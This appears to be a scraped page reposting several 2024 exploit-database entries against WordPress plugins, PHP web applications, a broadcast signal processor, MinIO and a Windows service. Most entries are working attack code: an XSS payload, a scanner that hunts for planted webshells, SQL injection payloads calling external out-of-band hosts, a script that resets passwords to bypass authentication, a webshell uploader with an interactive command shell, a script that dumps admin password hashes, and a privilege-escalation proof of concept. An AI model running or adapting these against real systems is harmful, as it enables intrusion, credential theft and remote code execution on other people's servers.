ISHACK AI BOT

# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.3.1 # Proof Of Concept: 1. Click Add New Watermark and enter the XSS payload into the Watermark Text. 2. Stored XSS will run on anyone who wants to edit this page. # Vulnerable Property: watermark_title # PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp # Request: POST /wp-admin/post.php HTTP/2 Host: erdemstar.local Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723 Content-Length: 1460 Upgrade-Insecure-Requests: 1 Origin: https://erdemstar.local Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=0, i _wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px

# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'Referer': 'www.google.com' } def URLdomain(url): if url.startswith("http://"): url = url.replace("http://", "") elif url.startswith("https://"): url = url.replace("https://", "") if '/' in url: url = url.split('/')[0] return url def check_security(url): fg = success_color fr = error_color try: url = 'http://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/about.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15) if '#0x2525' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'http://' + URLdomain(url) check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/epinyins.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Simple Shell' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('dummyyummy.txt', 'a').write(url + '/wp-content/plugins/dummyyummy/wp-signup.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) except Exception as e: print(f' -| {url} --> {fr}[Failed] due to: {e}') def main(): try: url_file_path = sys.argv[1] except IndexError: url_file_path = input(f"{info_color}Enter the path to the file containing URLs: ") if not os.path.isfile(url_file_path): print(f"{error_color}[ERROR] The specified file path is invalid.") sys.exit(1) try: urls_to_check = [line.strip() for line in open(url_file_path, 'r', encoding='utf-8').readlines()] except Exception as e: print(f"{error_color}[ERROR] An error occurred while reading the file: {e}") sys.exit(1) pool = ThreadPool(20) pool.map(check_security, urls_to_check) pool.close() pool.join() print(f"{info_color}Security check process completed successfully. Results are saved in corresponding files.") if __name__ == "__main__": main()

## Title: Best Student Result Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/08/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL# --- ```

# Exploit Title: Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass # Author: LiquidWorm # Vendor: Positron srl # Product web page: https://www.positron.it # https://www.positron.it/prodotti/apparati-broadcast/stereo-multicoder/tra-7005/ # Affected version: 1.20 # TRA7K5_REV107 # TRA7K5_REV106 # TRA7K5_REV104 # TRA7K5_REV102 # # Summary: The TRA7000 series is a set of products dedicated to broadcast, designed to # guarantee an excellent quality-price ratio in compliance with current regulations and # intended for individual broadcasters or radio networks. All models in the TRA7000 series # are fully digital, using only high-quality components such as 24-bit A/D and D/A converters # and 32-bit DSP. The TRA7005 performs the functions of Stereo Coder, RDS Coder, 5-output # MPX Distributor, AGC (adjustable) for both analogue and digital audio inputs, Clipper # for both analogue and digital audio inputs, change-over emergency switching between any # input with adjustable thresholds and intervention times, both in the switching phase on # the secondary source and in the return phase to the primary source. Ethernet connection # with Web-Server (optional) for total control and management of the device. Advanced BYPASS # system between MPX input and outputs, active on operating and power supply anomalies and # can also be activated remotely. # # Desc: The Positron Broadcast Digital Signal Processor TRA7005 suffers from an authentication # bypass through a direct and unauthorized access to the password management functionality. # The vulnerability allows attackers to bypass Digest authentication by manipulating the # password endpoint _Passwd.html and its payload data to set a user's password to arbitrary # value or remove it entirely. This grants unauthorized access to protected areas (/user, # /operator, /admin) of the application without requiring valid credentials, compromising # the device's system security. # # Tested on: Positron Web Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5813 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5813.php # # # 22.03.2024 # # import requests,sys print(""" ______________________________________ ┏┳┓• ┏┓ ┓ ┏┓ ┓ • ┃ ┓┏┓┓┏ ┃┃┏┓┏┏┓┏┏┏┓┏┓┏┫ ┣ ┓┏┏┓┃┏┓┓╋ ┻ ┗┛┗┗┫ ┣┛┗┻┛┛┗┻┛┗┛┛ ┗┻ ┗┛┛┗┣┛┗┗┛┗┗ ┛ ┛ for Positron Digital Signal Processor ZSL-2024-5813 ______________________________________ """) if len(sys.argv) != 4: print("Usage: python positron.py <ip:port> <user/oper/admin> <erase/new_pwd>") sys.exit(1) ip = sys.argv[1] ut = sys.argv[2] wa = sys.argv[3] valid_ut = ['user', 'oper', 'admin'] if ut.lower() not in valid_ut: print("Invalid user type! Use 'user', 'oper', or 'admin'.") sys.exit(1) url = f'http://{ip}/_Passwd.html' did = f'http://{ip}/_Device.html' try: r = requests.get(did) if r.status_code == 200 and 'TRA7K5' in r.text: print("Vulnerable processor found!") else: print("Not Vulnerable or not applicable. Exploit exiting.") sys.exit(1) except requests.exceptions.RequestException as e: print(f"Error checking device: {e}") sys.exit(1) headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept-Language': 'mk-MK,en;q=0.6', 'Accept-Encoding': 'gzip, deflate', 'User-Agent' : 'R-Marina/11.9', 'Accept' : '*/*' } payload = {} if wa.lower() == 'erase': payload[f'PSW_{ut.capitalize()}'] = 'NONE' else: payload_key = f'PSW_{ut.capitalize()}' payload[payload_key] = wa #print(payload) r = requests.post(url, headers=headers, data=payload) print(r.status_code) print(r.text)

## Title: Human Resource Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/02/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: cityedit (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+'' ELSE 0x28 END)) AND 'GMzs'='GMzs Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) AND 'Jtnd'='Jtnd --- ```

# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi # Date: February 25th, 2024 # Exploit Author: Stefan Hesselman # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Kali Linux # CVE: N/A # CWE: CWE-89, CWE-74 ## Description Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database. ## Vulnerable endpoint: http://example.com/Daily-Expense-Manager/readxp.php?term=asd ## Vulnerable HTTP parameter: term (GET) ## Exploit proof-of-concept: http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20- ## Vulnerable PHP code: File: /Daily-Expense-Manager/readxp.php, Lines: 16-23 <?php [...] //get search term $searchTerm = $_GET['term']; # unsanitized and under control of the attacker. //get matched data from skills table $query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname"); while ($row = $query->fetch_assoc()) { $data[] = $row['pname']; } //return json data echo json_encode($data); ?>

# Exploit Title: GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload # Date: 2024-02-04 # Exploit Author: Georgios Tsimpidas # Vendor Homepage: https://www.openeclass.org/ # Software Link: https://download.openeclass.org/files/3.15/ # Version: 3.15 (2024) # Tested on: Debian Kali (Apache/2.4.57, PHP 8.2.12, MySQL 15.1) # CVE : CVE-2024-31777 # GUnet OpenEclass <= 3.15 E-learning platform - Unrestricted File import requests import argparse import zipfile import os import sys RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?> """ def banner(): print(f'''{RED} {YELLOW} ============================ Author: Frey ============================ {RESET}''') def execute_command(openeclass, filename): while True: # Prompt for user input with "eclass" cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}") # Check if the command is 'quit', then break the loop if cmd.lower() == "quit": print(f"{ORANGE}\nExiting...{RESET}") clean_server(openeclass) sys.exit() # Construct the URL with the user-provided command url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}" # Execute the GET request try: response = requests.get(url) # Check if the request was successful if response.status_code == 200: # Print the response text print(f"{GREEN}{response.text}{RESET}") except requests.exceptions.RequestException as e: # Print any error that occurs during the request print(f"{RED}An error occurred: {e}{RESET}") def upload_web_shell(openeclass, username, password): login_url = f'{openeclass}/?login_page=1' login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' # Login credentials payload = { 'next': '/main/portfolio.php', 'uname': f'{username}', 'pass': f'{password}', 'submit': 'Enter' } headers = { 'Referer': login_page_url, } # Use a session to ensure cookies are handled correctly with requests.Session() as session: # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens session.get(login_page_url) # Post the login credentials response = session.post(login_url, headers=headers, data=payload) # Create a zip file containing the malicious payload zip_file_path = 'malicious_payload.zip' with zipfile.ZipFile(zip_file_path, 'w') as zipf: zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) # Upload the zip file url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert' files = { 'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'), 'certhtmlfile': (None, ''), 'orientation': (None, 'L'), 'description': (None, ''), 'cert_id': (None, ''), 'submit_cert_template': (None, '') } response = session.post(url, files=files) # Clean up the zip file os.remove(zip_file_path) # Check if the upload was successful if response.status_code == 200: print(f"{GREEN}Payload uploaded successfully!{RESET}") return True else: print(f"{RED}Failed to upload payload. Exiting...{RESET}") return False def clean_server(openeclass): print(f"{ORANGE}Cleaning server...{RESET}") # Remove the uploaded files requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip") requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php") print(f"{GREEN}Server cleaned successfully!{RESET}") def main(): parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution") parser.add_argument('-u', '--username', required=True, help="Username for login") parser.add_argument('-p', '--password', required=True, help="Password for login") parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass") args = parser.parse_args() banner() # Running the main login and execute command function if upload_web_shell(args.eclass, args.username, args.password): execute_command(args.eclass, 'evil.php') if __name__ == "__main__": main()

# Exploit Title : Open Source Medicine Ordering System v1.0 - SQLi # Author : Onur Karasalihoğlu # Date : 27/02/2024 # Sample Usage % python3 omos_sqli_exploit.py https://target.com Available Databases: 1. information_schema 2. omosdb Please select a database to use (enter number): 2 You selected: omosdb Extracted Admin Users Data: 1 | Adminstrator | Admin | | 0192023a7bbd73250516f069df18b500 | admin 2 | John | Smith | D | 1254737c076cf867dc53d60a0364f38e | jsmith ''' import requests import re import sys def fetch_database_names(domain): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',schema_name)),'enforsec')%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20-" try: # HTTP request response = requests.get(url) response.raise_for_status() # exception for 4xx and 5xx requests # data extraction pattern = re.compile(r'enforsec\["(.*?)"\]enforsec') extracted_data = pattern.search(response.text) if extracted_data: databases = extracted_data.group(1).split(',') databases = [db.replace('"', '') for db in databases] print("Available Databases:") for i, db in enumerate(databases, start=1): print(f"{i}. {db}") # users should select omos database choice = int(input("Please select a database to use (enter number): ")) if 0 < choice <= len(databases): selected_db = databases[choice - 1] print(f"You selected: {selected_db}") fetch_data(domain, selected_db) else: print("Invalid selection.") else: print("No data extracted.") except requests.RequestException as e: print(f"HTTP Request failed: {e}") def fetch_data(domain, database_name): url = f"{domain}/admin/?page=reports&date=2024-02-22'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT('enforsec',JSON_ARRAYAGG(CONCAT_WS(',',`type`,firstname,lastname,middlename,password,username)),'enforsec') FROM {database_name}.users-- -" try: # HTTP request response = requests.get(url) response.raise_for_status() # exception for 4xx and 5xx requests # data extraction pattern = re.compile(r'enforsec\[(.*?)\]enforsec') extracted_data = pattern.search(response.text) if extracted_data: print("Extracted Admin Users Data:") data = extracted_data.group(1) rows = data.split('","') for row in rows: clean_row = row.replace('"', '') user_details = clean_row.split(',') print(" | ".join(user_details)) else: print("No data extracted.") except requests.RequestException as e: print(f"HTTP Request failed: {e}") def main(): if len(sys.argv) != 2: print("Usage: python3 omos_sqli_exploit.py <domain>") sys.exit(1) fetch_database_names(sys.argv[1]) if __name__ == "__main__": main()

# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation # Date: 2024-04-11 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z # Tested on: Windows 10 # CVE : CVE-2024-24747 # Required before execution: pip install minio,requests import argparse import datetime import traceback import urllib from xml.dom.minidom import parseString import requests import json import base64 from minio.credentials import Credentials from minio.signer import sign_v4_s3 class CVE_2024_24747: new_buckets = [] old_buckets = [] def __init__(self, host, port, console_port, accesskey, secretkey, verify=False): self.bucket_names = ['pocpublic', 'pocprivate'] self.new_accesskey = 'miniocvepoc' self.new_secretkey = 'MINIOcvePOC' self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'Content-Type': 'application/json', 'Accept': '*/*' } self.accesskey = accesskey self.secretkey = secretkey self.verify = verify if verify: self.url = "https://" + host + ":" + port self.console_url = "https://" + host + ":" + console_port else: self.url = "http://" + host + ":" + port self.console_url = "http://" + host + ":" + console_port self.credits = Credentials( access_key=self.new_accesskey, secret_key=self.new_secretkey ) self.login() try: self.create_buckets() self.create_accesskey() self.old_buckets = self.console_ls() self.console_exp() self.new_buckets = self.console_ls() except: traceback.print_stack() finally: self.delete_accesskey() self.delete_buckets() if len(self.new_buckets) > len(self.old_buckets): print("There is CVE-2024-24747 problem with the minio!") print("Before the exploit, the buckets are : " + str(self.old_buckets)) print("After the exploit, the buckets are : " + str(self.new_buckets)) else: print("There is no CVE-2024-24747 problem with the minio!") def login(self): url = self.url + "/api/v1/login" payload = json.dumps({ "accessKey": self.accesskey, "secretKey": self.secretkey }) self.session = requests.session() if self.verify: self.session.verify = False status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 204: status_code = 0 else: print('Login failed! Please check if the input accesskey and secretkey are correct!') exit(1) def create_buckets(self): url = self.url + "/api/v1/buckets" for name in self.bucket_names: payload = json.dumps({ "name": name, "versioning": False, "locking": False }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 200: status_code = 0 else: print("新建 (New)"+name+" bucket 失败 (fail)！") def delete_buckets(self): for name in self.bucket_names: url = self.url + "/api/v1/buckets/" + name status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: status_code = 0 else: print("删除 (delete)"+name+" bucket 失败 (fail)！") def create_accesskey(self): url = self.url + "/api/v1/service-account-credentials" payload = json.dumps({ "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}", "accessKey": self.new_accesskey, "secretKey": self.new_secretkey }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 201: # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！") # print(self.new_secretkey) status_code = 0 else: print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！") def delete_accesskey(self): url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8') status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: # print("删除" + self.new_accesskey + " accessKey成功！") status_code = 0 else: print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！") def headers_gen(self,url,sha256,method): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(url) headers = { 'X-Amz-Content-Sha256': sha256, 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method=method, url=urls, region='us-east-1', headers=headers, credentials=self.credits, content_sha256=sha256, date=datetimes, ) return headers def console_ls(self): url = self.console_url + "/" sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" headers = self.headers_gen(url,sha256,'GET') if self.verify: response = requests.get(url,headers=headers,verify=False) else: response = requests.get(url, headers=headers) DOMTree = parseString(response.text) collection = DOMTree.documentElement buckets = collection.getElementsByTagName("Bucket") bucket_names = [] for bucket in buckets: bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data) # print('当前可查看的bucket有:\n' + str(bucket_names)) return bucket_names def console_exp(self): url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95" headers = self.headers_gen(url, sha256, 'POST') hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336" content = bytes.fromhex(hex_string) if self.verify: response = requests.post(url,headers=headers,data=content,verify=False) else: response = requests.post(url,headers=headers,data=content) status_code = response.status_code if status_code == 204: # print("提升" + self.new_accesskey + " 权限成功！") status_code = 0 else: print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！") if __name__ == '__main__': logo = """ ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ | / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / | (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ """ print(logo) parser = argparse.ArgumentParser() parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000") parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090") parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.") args = parser.parse_args() CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

# Exploit Title: Terratec dmx_6fire USB - Unquoted Service Path # Google Dork: null # Date: 4/10/2024 # Exploit Author: Joseph Kwabena Fiagbor # Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/ # Software Link: # Version: v.1.23.0.02 # Tested on: windows 7-11 # CVE : CVE-2024-31804 1. Description: The Terratec dmx_6fire usb installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof > C:\Users\Astra>sc qc "ttdmx6firesvc" > {SC] QueryServiceConfig SUCCESS > > SERVICE_NAME: ttdmx6firesvc > TYPE : 10 WIN32_OWN_PROCESS > START_TYPE : 2 AUTO_START > ERROR_CONTROL : 1 NORMAL > BINARY_PATH_NAME : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service > LOAD_ORDER_GROUP : PlugPlay > TAG : 0 > DISPLAY_NAME : DMX6Fire Control > DEPENDENCIES : eventlog > : PlugPlay > SERVICE_START_NAME : LocalSystem > >

